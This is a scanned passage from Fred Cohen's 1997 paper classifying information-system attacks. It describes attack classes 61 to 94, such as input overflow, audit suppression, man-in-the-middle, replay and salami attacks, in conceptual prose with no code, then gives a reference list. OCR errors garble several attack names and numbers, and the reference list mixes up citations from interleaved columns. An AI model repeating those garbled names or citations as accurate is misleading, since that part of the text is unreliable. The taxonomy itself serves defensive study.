of a backup and by having to recreate an overall CRC code for the entire backup when altering only one component. None of these operations are very com- plexand all can be accomplished with near-linear time and space techniques.

Attack 61: hangup hooking. Activity termination proto- cols fail or are interrupted so that termination does not complete properly and the protocol is taken over by the attacker. Examples include modem hangup failures leaving logged-in terminal sessions open to abuse, interrupted telnet sessions taken over by at- tackers, preventing proper protocol completion as in the Internet !3YN attacks so as to deny subsequent services, and refusing to completely disconnect from a call-back modem at the CO, causing the call-back mechanism to become ineffective. These classes of attacks are normally simple to carry out with prob- abilistic effects depending on the environment.

Attack 62: cullfonvurdingfakery. Call forwarding capa- bilities are abused. Examples include the use of computer controlled call forwarding to forward calls from call-back modems to that attackers get the call- backs, forwarding calls to illegitimate locations so as to intercept communications and provide false or misleading information, and the use of programma- ble call forwarding to cause long distance calls to be billed to the forwarding party’s account. This class of attacks are relatively simple to carry out but often require a precondition of breaking into a system in- volved in the forwarding operation.

Attack 63: input overjlow. Excessive input is used to overrun input buffers, thus overwriting program or data storage so as to grant the attacker undesired access. Examples include sendmail overflows resulting in unlimited system access from attackers over the Internet, Web server overflows granting Internet attackers unlimited access to Web servers, buffer over-runs in privileged programs allowing users to gain privilege, and excessive input used to over-run input buffers causing loss of critical data so as to deny services or disrupt operations. In the case of denial of service, these attacks are trivial to carry out with a high probability of success. If the attacker wishes to gain access for more specific results, it is usually necessary to identify characteristics of the system under attack and create a customized attack version for each victim configuration. This is not very complex but it is time and resource consumptive.

Attack 64: illegal value insertion. Values not permitted by the specification but allowed to pass the implementa- tion are used to cause abnormal results. Examples include negative dates producing negative interest which accrues to the benefit of the attacker, cash withdrawal values which overflow signed integers in balance adjustment causing large withdrawals to ap- pear as large deposits, and pointer values sent to system calls that point to areas outside of authorized address space for the calling party Most such attacks are easily carried out once discovered, but systemati- cally discovering such attacks is, in general, similar to the complexity of grey box testing until the first fault is found.

Attack 65: residual data gathering. Data left as a result of incomplete or inadequate deletion is gathered. Exam- ples include object reuse attacks like the DOS undelete command in insecure operating systems, electromagnetic analysis of deleted media to regain deleted bits, and electron microscopy techniques used to extract overwritten data. Residual data gath- ering in the case of simple undeletions or allocating large volumes of space and examining their content is straightforward. Looking for residual data on mag- netic media using electromagnetic measurements and electron microscopy is somewhat more complex and requires statistical analysis and correlation of sig- nals in a signal processing component. While this is not trivial, it is within the capability of most electrical engineers and electronics specialists.

Attack 66: privileged program misuse. Programs with privilege are misused so as to provide unauthorized privileged functions. Examples include the use of a backup restoration program by an operator to inten- tionally restore the wrong information, misuse of an automated script processing facility by forcing it to make illicit copies of legitimate records, and the use of configuration management tools to create vulner- abilities. Once a vulnerability has been identified, exploitation is straightforward. Systematically discov- ering such attacks is, in general, similar to the complexity of gray box testing until the first fault is found.

Attack 67: error-induced misoperation. Errors caused by the attacker induce incorrect operations. Examples include the creation of a faulty network connection to deny network services, the intentional introduc-

39

Page 12: Information system attacks: A preliminary classification scheme

Large Information System Attack Methods: A Preliminary Classification Scheme/Fred Cohen

tion of incorrect data resulting in incorrect output (i.e. garbage in - garbage out), and the use of a scratched and bent diskette in a disk drive to cause the drive to permanently fail. Many of these attacks appear to be trivial to accomplish.

Attack 68: audit suppression. Audit trails are prevented from operating properly. Examples include overload- ing audit mechanisms with irrelevant data so as to prevent proper recording of malicious behaviour, net- work packet corruption to prevent network-based audit trails from being properly recorded, and con- suming some resource critical to the auditing process so as to prevent audit from being generated or kept. This class of attacks has not been thoroughly analyzed from a mathematical standpoint, but it appears that in most systems, audit trail suppression is straightfor- ward. It may be far more difficult to accomplish this in a system designed to provide a high assurance of audit completeness.

Attack 69: induced stress failures. Stresses induced on a system cause it to fail. Examples include paging mon- sters that result in excessive paging and reduced performance, process viruses that consume various system resources, and large numbers of network packets per unit time which tie up systems by forcing excessive high-priority network interrupt processing. Although some attacks of this sort appear to be avail- able without substantial effort, in general, understanding the implications of stress on multi- processing systems is beyond the current theory It appears from a cursory examination that this is at least as complex as the interrupt sequence problem which appears to be factorial in the number of instructions in each of the simultaneous processes.

Attack 70: hardware-system failure-flaw exploitation. Known hardware or system flaws are exploited by the attacker. Examples include a hardware flaw permit- ting a power-down instruction to be executed by a non-privileged user, causing an operating system to use results of a known calculation error in a particular microprocessor for a key decision, and sending a packet with a parameter that is improperly handled by a network component. Discovering hardware flaws is, in general, similar in complexity to discovering soft- ware flaws, which makes this problem at least NP-complete.

Attack 71:false updates. Causing illegitimate updates to be made. Examples include sending a forged update disk containing attack code to a victim, interrupting the normal distribution channel and introducing an intentionally flawed distribution tape to be delivered, and substituting a false update disk for a real one at the vendor or customer site. This attack appears to be easily carried out against many installations and ex- amples have shown that even well-trained and adequately briefed employees fail to prevent such an attack. In cases where relatively secure distribution techniques are used, the complexity may be driven up, but more often than not, the addition of a disk will bypass even this sort of process.

Attack 72: network service and protocol attacks. Charac- teristics of network services are exploited by the attacker. Examples include the creation of infinite protocol loops which result in denial of services (e.g., echo packets under IP), the use of information pack- ets under the Network News Transfer Protocol to map out a remote site, and use of the Source Quench protocol element to reduce traffic rates through select network paths. Analyzing protocol specifications to find candidate attacks appears to be straightforward and implementing many of these attacks has proven within the ability of an average programmer. In gen- eral, this problem would appear to be as complex as analyzing protocols which has been studied in depth before and shown to be at least NP-complete for certain subclasses of protocol elements.

Attack 73: distributed coordinated attacks. A set of attackers use a set of vulnerable intermediary systems to attack a set ofvictims. Examples include a Web-based attack causing thousands of browsers used by users at sites all around the world to attack a single victim site, a set of simultaneous attacks by a coordinated group of attackers to try to overwhelm defences, and an attack where thousands of intermediaries were fooled into trying to gain access to a victim site. Devising DCAs appears to be simple while tracing a DCA to a source can be quite complex. Early results indicate that track- ing a DCA to a source is exponential in the number of intermediaries involved, while detecting a high- volume DCA appears to be straightforward.

Attack 74: man-in-the-middle. The attacker positions forces between two communicating parties and both intercepts and relays information between the parties

40

Page 13: Information system attacks: A preliminary classification scheme

Computers & Security, Vol. 16, No. I

so that each believes they are talking directly to the other when, in fact, both are communicating through the attacker. Examples include attacks on public key cryptosystems permitting a man-in-them-middle to fool both parties, attacks wherein an attacker takes over an ongoing telecommunications session when one party decides to terminate it, and attacks wherein an attacker inserts transactions and prevents responses to those transactions from reaching the legitimate user. Man-in-the-middle attacks normally require the implementation of a near-real-time capability, but there are no mathematical impediments to most such attacks.

Attack 7.5: selectedplaintexl. The attacker gets one of the parties to encrypt or sign one or more messages of the attacker’s choosing, thus causing information about the victim’s system to be revealed. Examples include causing a user of the RSA signature system to reveal their secret key through a series of signatures, the introduction of malicious commands into the data entry stream of a victim who is blindly following directions of a remote person claiming to be assisting them, and inducing a bank to make a series ofattacker- specified transactions so as to cause cryptographic protocols, methods, or keys to be revealed. Selected plaintext attacks have differing complexity depending on the system under attack. Attacks on RSA systems have been shown to be linear in time and polynomial in space.

Attack 76: replay attacks. Communicated information is replayed and causes unanticipated side effects. Exam- ples include the replay of encrypted funds transfer transmissions so as to cause multiples of an original sum of money to be transferred, replay of coded messages causing the repeated movement of troops, replay of transaction sequences that simulate behav- iour so as to cover up actual behaviour, and the delayed replay of events such as races so as to deceive a victim. Replay attacks are typically simple to per- form and require little or no sophistication. In some cases, relatively complex coding may be required in order to reproduce CRC codes or checksums, but this is normally not required for replay attacks.

Attack 77: cryptanalysis. Cryptographic techniques are analyzed so as to find methods to break codes used to secure information. Examples include frequency analysis for breaking monoalphabetic substitution ci-

phers, index of coincidence analysis for breaking polyalphabetic substitution ciphers, the breaking of the Enigma cipher in World War II through mathe- matical and optical techniques combined with knowledge of keys and key usage, exhaustive attacks on the DES encryption standard, code-listeners for breaking many analogue speech encoding systems, and improved factoring for breaking cryptosystems based on modular arithmetic. Cryptanalysis is a widely studies mathematical area and typically in- volves a great deal of expertise and computing power against modern cryptographic systems. Cryptanalysis of improperly designed systems and of systems more invented before the 1940s is almost universally ac- complished by relatively simple automation.

Attack 78: breaking key management systems. Keys in cryptographic systems are managed by imperfect management systems that are attacked in order to gain access to keying materials. Examples include attacks based on inadequate randomness in key generation techniques, exploitation of selected plaintext attacks against inadequately implemented automated en- cryption systems, and breaking into computers housing keying materials. Many key management attacks require a substantial amount of computing power, but this is normally on the order of only a few million computations to break a key that could not be broken exhaustively under any feasible scheme. The complexity of these attacks tends to be specific to the particular key management system. In many cases, the weakest link is the computer housing the keys and this is often attacked in a relatively small amount of time through other techniques.

Attack 79: covert channels. Channels not normally in- tended for information flow are used to flow information. Examples include widely known covert channels in secure operating systems, time-based covert channel exploitation in encryption engines, and covert channels created by the association of movements of people with activities. It has been shown that in any system using shared resources in a non-fured fashion, covert channels exist. They are typically easy to exploit using Shannon’s communi- cations theory to provide an arbitrary reliability at a given bandwidth based on the channel bandwidth and signal to noise ratio of the covert channel. Avoid- ing detection depends primarily on remaining below

41

Page 14: Information system attacks: A preliminary classification scheme

Large Information System Attack Methods: A Preliminary Classification Scheme/Fred Cohen

the detection threshold used by detection techniques to try to detect covert channel activity

Attack 80: error insertion and analysis. Errors are induced into systems to reveal values stored in those systems. Examples include recent demonstrations of methods for inducing errors so as to reveal keys stored in smart-cards and other similar key-transportation de- vices, the introduction of multiple errors into redundant systems so as to cause the redundancy to fail, and the introduction of errors designed to cause systems to no longer be used in critical applications. The complexity of error insertion is not known, how- ever, many researchers have recently claimed to have produced efficient and reliable insertion techniques. The mathematics in this area is quite new and defini- tive results are still pending.

Attack 82: rtjZexive control. Reflexive reactions are ex- ploited by the attacker to induce desired behaviours. Examples include the creation of attacks that appear to come from a friend so as to cause automated response systems to shut down friendly communica- tion, induction of select flaws into the power grid so as to cause SCADA systems to reroute power to the financial advantage of select suppliers, and the use of forged or interrupted signals so as to cause friendly fire incidents. The concept of reflexive control is easily understood, and for simplistic automated re- sponse systems, finding exploitations appears to be quite simple, but there has been little mathematical work in this area (other than general work in control theory) and it is premature to assess a complexity level at this time. In general, it appears that this problem may be related to the problems in producing and analyzing cascade failures in that causing desired re- flexive reaction with a reasonable degree of control may be quite complex.

Attack 82: dependency analysis and exploitation. Interde- pendencies of systems and components are analyzed so as to determine indirect effects and attack weak points upon which strong points depend. Examples include attacking medical information systems in or- der to disrupt armed forces deployments, attacking the supply chain in order to corrupt information within an organization, and attacking power grid ele- ments in order to disrupt financial systems. The analysis of dependencies appears to require substan- tial detailed knowledge of an operation or similar

operations. Finding common critical dependencies appears to be straightforward, but producing desired and controllable effects may be more complex. Mathematical analysis of this issue has not been pub- lished to date. Common mode faults and systemic flaws are of particular utility in this sort of attack.

Attack 83: interprocess communication attacks. Interproc- ess communications channels are attacked in order to subvert normal functioning. Examples include the introduction of false interprocess signals in a network interprocess communications protocol causing mis- behaviour of trusted programs, the disruption of interprocess communications by resource exhaustion so as to prevent proper checking or reduce or elimi- nate functionality, and observation of interprocess communications stored in shared temporary data files so as to gain unauthorized information. Interprocess communication attacks orientated toward disruption appear to be easily accomplished, but no mathemati- cal analysis of this class of attacks has been published to date.

Attack 84: below-threshold attacks. Attack detection based on thresholds of activity that differentiate be- tween attacks and similar non-malicious behaviours is exploited by launching attacks that operate below the detection threshold. Examples include breadth- first password guessing attacks, breadth-first port scanning attacks, and low bandwidth covert channel exploitations. Remaining below detection thresholds is straightforward if the thresholds are known and not possible to guarantee if they are unknown. In most cases, estimates based on comparable policies or widely published standards are adequate to accom- plish below-threshold attacks.

Attack 85: peer relationship exploitation. The transitive trust relationships created by peer-networking are exploited so as to expand privileges to the transitive closure of peer trust. Examples include the activities carried out by the Morris Internet virus in 1988, the exploitation of remote hosts (.rhosts) files in many networks, and the exploitation of remote software distribution channels as a channel for attack. Exploit- ing peer relationships appears to be easily accomplished, requiring only a cursory examination of history for a set of candidate peers and trial and error for exploitation.

42

Page 15: Information system attacks: A preliminary classification scheme

Computers & Security, Vol. 16, No. 1

Attack 86: inappropriate defaults. Unchanged default values set into systems at the factory or in a standard distribution process are known to and exploited by attackers to gain unauthorized access. Example in- clude default passwords, default accounts, and default protection settings. It may be quite difficult to create a comprehensive lists of appropriate defaults for any non-trivial system because the optimal settings are determined by the application. No substantial mathe- matics has been done on analyzing the complexity of finding proper settings, but many lists of improper defaults published for select operating systems appear to require only linear time and space with the number of files in a system in order to verify and correct mis-settings.

Attack 87: piggybacking. Exploiting a (usually false) association to gain advantage. Examples include walk- ing into a secure facility with a group of other people as one of the crowd, acting like an ex-policeman to gain intelligence about ongoing police activities, and adding a floppy disk to a series of floppy disks deliv- ered as part of a normal update process. No published measures of complexity for piggybacking attacks have been made to date, however, certain types of these attacks appear to be trivially carried out.

Attack 88: collaborative misuse. Collaboration of several parties or identities in order to misuse a system. Examples include creation of a false identity by one party and entry of that identity into a computer data- base by a second party, provision of attack software by an outsider to an insider who is participating in an information theft, partitioning of elements of an at- tack into multiple parts for coordinated execution so as to conceal the fact of or source of an attack, and the providing of alibis by one party to another when the collaborated in a crime. Collaborative misuse has not been extensively analyzed mathematically, but limited analysis has been done from a standpoint of identify- ing effects ofcollaborations on leakage and corruption in POSet networks and results indicate that detecting or limiting collaborative effects is not highly complex if the individual attacks are detectable.

Attack 89: race conditions. Interdependent sequences of events are interrupted by other sequences of events that destroy critical dependencies. Examples include the change of conditions tested in one step and de- pended upon for the next step (e.g. checking for the

existence of a file before creating it interrupted by the creation of a file of the same name by another owner), changes between one step in a process and another step assuming that no such change has been made (e.g. the replacement of a mounted file system pre- viously loaded with data in a start-up process), and waiting for non-locked resources available in one step but not in the next (e.g. the mounting of a different tape between an initial read-through and a sub- sequent restoration). Race conditions are not easy to detect. In general, they require at least NP-complete time and space and may require factorial time in some cases. Some automated analysis tools have been im- plemented to detect certain classes of race conditions in source code and have shown promise.

Attack 90: strategic or tactical deceptions. Deceptions are generally categorized as comprising of concealment, camouflage, false and planted information, ruses, dis- plays, demonstrations, feints, lies, and insight (as described in Dunnigan, 1995). Examples include the creation of a questionnaire asking for detailed infor- mation security backgrounds under the auspices of a possible contract used to determine what expertise is available at a particular company to defend against a particular type of attack (a ruse), the creation of a false front organization such as a garbage collection busi- ness in order to gain access to valuable information often placed in the trash (camouflage) and the claim of having special capabilities in your upcoming prod- uct in order to force other vendors to work in that area even though you never intend to enter into it (a feint). In general deceptions comprise a complex class of techniques, some subclasses of which are known to be undecidable to detect and trivial to create, other subclasses of which of which have not been analyzed.

Attack 91: combinations and sequences. Many attacks combine several techniques synergistically in order to affect their goal. Examples include exploiting an emergency response to a flood to gain entry into a terminal room where password guessing gains entry into a system and subsequent data diddling alters billing records, the use of a virus to create protection mis-setting which are subsequently exploited by planting a Trojan horse to allow re- entry and the creation of fictitious people in key offices who are automatically granted access to appropriate systems (process bypassing) to allow the attacker access to other systems, and the creation of an attractive Web

43

Page 16: Information system attacks: A preliminary classification scheme

Large Information System Attack Methods: A Preliminary Classification Scheme/Fred Cohen

site designed to exploit users who visit it by sending their browsers content-based attacks that set up covert channels through firewalls and extend access through peer network relationships to other systems within the victim’s network. Combinations and sequences of attacks are at least as complex as their individual components, and may be more complex to create in coordination. Detection may be less complex because detection of any subset or subsequence may be ade- quate to detect the combined attack. This has not been studied in any mathematical depth to date.

Attack 92: kiting. Inherent delays are exploited by cre- ating a ring of events that chase each others’ tails, thus creating the dynamic illusion that things are different the static case would support. Examples include check kiting schemes where delays in processing checks causes temporary conditions where the sum of the balances indicated in a set of accounts is far greater than the total amount of money actually invested, techniques for avoiding payments of debts for a long time based on legally imposed delays in and rules regarding the collection of debts by third parties, and the use of revoked keys in key management systems without adequate revocation protocols. The com- plexity of kiting schemes has not been mathematically analyzed in published literature to date, but indica- tions from actual cases are that substantial computing power is required to track substantial kiting schemes. The first case where such a scheme was detected and prosecuted was detected because the kiter’s computer failed for a long enough period of time that the set of transactions and delays could no longer be tracked - the kite fell out of the sky.

Attack 93: salami attacks. Many small transactions are used together for a larger aggregated effect. Examples include taking round-off error amounts from finan- cial interest computations and adding them to the thief’s account balance (resulting in no net loss to the system), the slow leakage of information through covert channels at rates below normal detection thresholds, and economic intelligence gathering ef- forts involving the aggregation of small amounts of information from many sources to derive an overall picture of an organization. Attacks of this sort are relatively easy to create. Mathematical analysis of the general class of salami attacks has not been done but it seems likely to be similar in complexity to analysis of data aggregation effects.

Attack 94: repudiation. A transaction or other operation is repudiated by the party recorded as initiating it. Examples include repudiating a stock trade, claiming your account was broken into and that you didn’t do it, and asserting that an electronic funds transfer was not done. Repudiation has been addressed with cryp- tographic techniques, but for the most part, these techniques are easily broken - in the sense that a person wishing to repudiate a future transaction can always act to make repudiation supportable. In stock trades, this problem has been around for a long time and is primarily addressed by recording all telephone calls (which form the basis for each transaction) and using the recorded message to resolve the issue when a disagreement is identified.

Summary It is hoped that this list will be a starting point and not an ending point. If all goes well and many of the readers comment on this listing, efforts will be made to improve and expand upon the list in the future and to relate our results to the readership again at a later date.

References Agudo, 1996. Assessment of Electric Power Control Systems Security, Joint Program Office for Special Technology Countermeasures, September 30, 1996.

Bell, D.E. and LaPadula, L.J., 1973. Secure Computer Systems: MathematicalFoundationsandModel. TheMitre Corporation, 1973.

Bellovin, S.M., 1989. Security Problems in the TCP/IP Protocol Suite. ACM SIGCOMM. Computer Communications Review, April 1989, pp. 32-48.

Bellovin, S.M., 1992. There Be Dragons, Proceedings tithe Third UsenixUNIXSecurity Symposium. Baltimore, September 1992.

Biba, K.J., 1977. Integrity Considerations for Secure Computer Systems, USAF Electronic Systems Division, 1977.

Bishop, M. and Dilger, M., 1996. Checking for Race Conditions in File Access.

Bochmann, G.V. and Gecsei, J., 1977. A Unified Method for the Specification and Verification of Protocols, IFIP Congress, Toronto, 1977, pp. 229-234.

Cheswick, W. and Bellovin, S.M., 1994. Firewalls and Internet Security - Repelling the Wiley Hacker, Addison-Wesley, 1994.

44

Page 17: Information system attacks: A preliminary classification scheme

Computers & Security, Vol. 16, No. I

Cohen, F., 1984. Computer Viruses - Theory and Experiments, IFIP TC-11 Conference, Toronto, 1984.

Cohen, F., 1985. Algorithmic Authentication of Identification, Information Age, January 1985, pp. 35-41,7, 1.

Cohen, F., 1985b A Secure Computer Network Design, IFIP, TC-11, Computer5 G Security, Vol. 4, No. 3, 1985, pp. 189-205.

Cohen, F., 1986. Computer I”iruses, ASP Press, 1986.

Denning, D.E., 1975. Secure Information Flow in Computer Systems, Ph.D. dissertation, Purdue Univ., West Lafayette, Indiana, USA, 1975.

Denning, D.E., 1976. A Lattice Model of Secure Information Flow, Communications of the ACM, Vol. 19, No. 5, 1976, pp. 236-243.

Denning, D.E., 1982. Cryptography and Data Security, Addison Wesley, Reading, Masachusetts, USA, 1982.

Cohen, F., 1987. Protection and Administration of Information Networks under Partial Orderings, IFIP-TCll, Computer5 G Security, Vol. 6, 1987, pp. 118-128.

Cohen, F., 1987b. Introductory Information Protection, ASP Press, 1987.

Cohen, F., 1988. A New Integrity-Based Model for Limited Protection Against Computer Viruses, Masters Thesis, The Pennsylvania State University, College Park, PA, 1988.

Cohen, F., 1988b. Models of Practical Defenses Against Computer Viruses, IFIP-TCll, Computers l3 Security, Vol. 7, No. 6, 1988.

Cohen, F., 1991. A Short Course on Systems Administration and Security Under Unix, ASP Press, 1991.

Dunn&an, J.F. and Nofi, A.A., 1995. Victory and Deceit -Diq Tricks at War, William Morrow and Co., 1995.

Feustal, E.A., 1973. On the Advantages of Tagged Architecture, IEEE Trans. on Computers C-22, No. 7, July 1973, pp. 644-656.

GASSP, 1995. Genera&Accepted System Securify Principles, Prepared by the GSSP Draft Sub-committee.

Hailpern, B.T. and Owicki, S.S., 1983. Modular Verification of Computer Communication Protocols, IEEE Communications, Vol. 31, No. 1, January 1983.

Harrison, M. et al., 1976. Protection in Operating Systems. CACM, Vo1.19, No. 8, August 1976, pp. 461-471.

Hecht, H., 1993. Rare Conditions - An Important Cause of

Cohen, F., 1994. A Short Course on Computer Viruses, 2nd Ed. New York: John Wiley, 1994.

Cohen, F., 1994b. Operating Systems Protection Through Program Evolution, IFIP-TCll, Computers G Security, 1994.

Cohen, F., 1994~. It’5 Alive!!!, John Wiley and Sons, 1994.

Cohen, F., 1995. Protection and Security on the Information Superhighway, Wiley and Sons, New York, 1995.

Cohen, F.et al., 1993. Defensive Information Warfare - InformationAssurance, TaskOrder 90-SAIC-019, DOD Contract No. DCA 100-90-C-0058, December, 1993.

Cohen, F., and Mishra, S., 1994. Experiments on the Impact of Computer Viruses on Modern Computer Networks, IFIP-TCl 1, Computer5 G Security, 1994.

_ Faults, IEEE O-7803-1251-1/93, 1993.

Hoffman, L.J., 1990. Rogue Programs: Viruses, Worms, and Trojan Horses, Von Noisted, Reinhold, 1990.

Knight, G., 1978. Cryptanalysts Corner, Cryptologia, Vol. 1, January 1978, pp. 68-74.

Lampson, B.W., 1973. A Note on the Confinement Problem, CACM, 16(l), October 1973, pp. 613-615.

Landwehr, C.E., 1983. The Best Available Technologies for Computer Security, IEEE Computer, Vol. 16, No. 7, July 1983.

Linde, R., 1975. Operating System Penetration, AIFIPS National Computer Conference, 1975, pp. 361-368.

Liepins, G.E. and Vaccaro, H.S., 1982. Intrusion Detection: Its Role and Validation, Computers & Securify, Vol. 11, 1992, pp. 347-355.

Cohen, F. et al., 1994. National Info-Set Technical Baseline - Intrusion Detection and Response, Lawrence Livermore National Laboratory Sandia National Laboratories, December, 1996.

Lyu, M., 1995. Handbook of Softwaare Reliability Engineering.

Merlin, PM., 1979. Specification and Validation of Protocols, IEEE Communications, Vol. 27, No. 11, November 1979.

Cohen, F., 1997. A Secure World-Wide-Web Server, IFIP-TCll, Computer5 G Secufify, 1997, in press. Neumann, PG., 1995. Computer Related Risks. Addison Wesley,

ACM Press, 1995. Neumann, I? and Parker, D., 1989. A Dagle, J. et al., 1996. Assessment of Information Assurance for Summary of Computer Misuse Techniques, Proceedings of the 12th the Utility Industry, Electric National Computer Conferewe, October 1989.

Power Research Institute, Draft, December 5, 1996, Palo Alto, NSTAC, 1996. National Security Telecommunication Advisory California. USA. Committee. Information Assurance Task Force - Electric Power

Danthine, A.A.S., 1982. Protocol Representationwith Finite State Machines, Computer Network Architectures and Protocols, PE. Green, Jr. Editor, Plenum Press, 1982.

Information Assurance Risk Assessment, November 1996 draft.

Palmer, J.W. and Sabnani, K.K., 1986. A Survey of Protocol &ii&on Techniques, MilCom, September 1986.

45

Page 18: Information system attacks: A preliminary classification scheme

Large Information System Attack Methods: A Preliminary Classification Scheme/Fred Cohen

Pekarske, R., 1990. Restoration in a Flash - Using DS3 Cross-connects, Telephony, September 10, 1990.

Sabnani, K.K. and Dahbura, A., 1985. A New Technique for Generating Protocol Tests, Computer Communicutions Review, 1985.

SAlC-Iw, 1995. Infownation Watj&e - Legal, Regulatory Policy, and Organizational ConsideratiomforAssurame, July 4, 1995.

Sarikaya, B and Bochmann, G.V, 1982. Some Experience with Test Sequence Generation for Protocols, Protocol Spec$ation, Testing, and Vm&ation ZZ, C. Sunshine editor, North-Holland Publishing, 1982.

Shannon, C., 1949. Communications Theory ofsecrecy Systems, Bell Systems l?chnicalJouwrul, 1949, pp. 656-715.

Spafford, E., 1992. Common System Vulnerabilities, Software Engineering Research Center, Computer Science Department, Purdue University, March 1992.

Sunshine, C., 1979. Formal Techniques for Protocol Specification and Verification, IEEE Computer, 1979.

Thyfault, M.E. et al., 1992. Weak Links, Information Week, August 10, 1992, pp. 26-31.

Turing, A., 1936. On Computable Numbers, with an Application to the Entscheidungs Problem, London Math Sot. SW 2, Vol42, November 12,1936, pp. 230-265.

van Eck, W., 1985. Electromagnetic Radiation from Video Display Units: An Eavesdropping Risk?, Computers G Security, Vol4,1985, pp. 269-286.

Voas, J. et al., 1993. A Model for Detecting the Existence of Software Corruptions in Real-Time, IFIP-TCll, Computers G Security, Vol. 12, No. 3, 1993, pp. 275-283.

Winkelman, 1995. Misdirected phone call shuts down local power, ACM SZGSOFT Software Engineering Notes, Vol. 20, No. 3; July 1995, pp. 7-8.

WSCC, 1996. Western Systems Coordinating Council, WSCC Preliminary System Disturbance Report, August 10, 1996, draft.

Fred Cohen can be reached at tel: +l 510-294-2087; fax: +l 510-294-1225.

46